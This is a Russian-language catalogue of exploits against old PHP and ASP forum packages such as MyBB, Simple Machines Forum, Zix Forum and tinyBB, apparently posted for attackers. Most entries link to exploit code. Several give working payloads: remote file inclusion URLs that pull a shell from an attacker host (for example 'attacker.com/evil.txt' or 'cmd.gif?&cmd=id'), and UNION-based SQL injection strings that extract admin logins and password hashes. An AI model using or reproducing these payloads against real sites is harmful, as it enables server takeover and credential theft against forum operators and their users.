ExBB Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell MercuryBoard <= 1.1.4 Отсутсвующая проверка поля USER-AGENT привела к sql иньекции Эксплоит : http://milw0rm.com/exploits/2247 VistaBB <= 2.x Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе Позволяет выполнять произвольные команды Эксплоит : http://milw0rm.com/exploits/2251 Simple Machines Forum 1.Simple Machines Forum <= 1.1 Ошибка в скрипте регистрации,позволяющая залить шелл Эксплоит : http://milw0rm.com/exploits/2231 2.Simple Machines Forum <= 1.3.1.3 Уязвимость в компоненте-надстройки форума SMF над MamboCMS http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts][/color] Woltlab Burning Board 2.3.5 Баг в модуле links.php приводит к выполнению произвольных sql-запросов Эксплоит : http://milw0rm.com/exploits/2197 Эксплоит : http://milw0rm.com/exploits/1810 MiniBB <=1.5 Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt? MyBB 1.MyBB <= 1.1.5 Недостаточная обработка поля CLIENT-IP позволяет создать юзера с привеллегиями администратора Эксплоит : http://milw0rm.com/exploits/2012 2.MyBB <= 1.1.3 Уязвимость в скрипте member.php приводит к созданию нового администратора форума Эксплоит : http://milw0rm.com/exploits/1950 3.MyBB < 1.1.3 Эксплоит позволяет выполнять произвольные команды на сервера Эксплоит :http://milw0rm.com/exploits/1909 PHORUM 5 Эксплоит работает с register_globals=On и magic_quotes_gpc=Off Эксплоит : http://milw0rm.com/exploits/2008 UBB Threads 1.UBBThreads 5.x,6.x Работает с register_globals on Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере 2.UBB.threads >= 6.4.x Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего Эксплоит : /addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id Zix Forum Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' qjForum Недостаточная обработка поля "uName" в скрипте 'member.php' Для выполнения эксплоита надо залогиниться на форум Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member tinyBB <= 0.3 Ошибка в скрипте 'footers.php',позволяющая залить шелл Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt? FunkBoard Уязвимост в скрипте profile.php позволяет сменить пасс выбранного юзера Эксплоит : http://milw0rm.com/exploits/1875 QBoard <= v.1.1 Ошибка в скрипте 'post.php',позволяющая залить шелл Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts] FlashBB <= 1.1.5 Ошибка в скрипте 'getmsg.php',позволяющая залить шелл Эксплоит : http://milw0rm.com/exploits/1921 LiteForum 2.1.1 Эксплоит-переборщик хеша пароля Эксплоит : http://rst.void.ru/download/r57lite211.txt Forum Russian Board 4.2 Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php' Эксплоит : http://rst.void.ru/download/r57frb.txt OpenBB 1.0.5 SQL-иньекция через нефильтруемый параметр CID Эксплоит : http://rst.void.ru/download/r57openbb.txt Gravity Board X v1.1 Выполнение произвольных команд через уязвимый скрипт 'editcss.php' Эксплоит : http://rst.void.ru/download/r57gravity.txt Zorum forum Выполнение SQL-иньекции через нефильтруемый параметр 'rollid' Эксплоит : http://rst.void.ru/download/r57zor.txt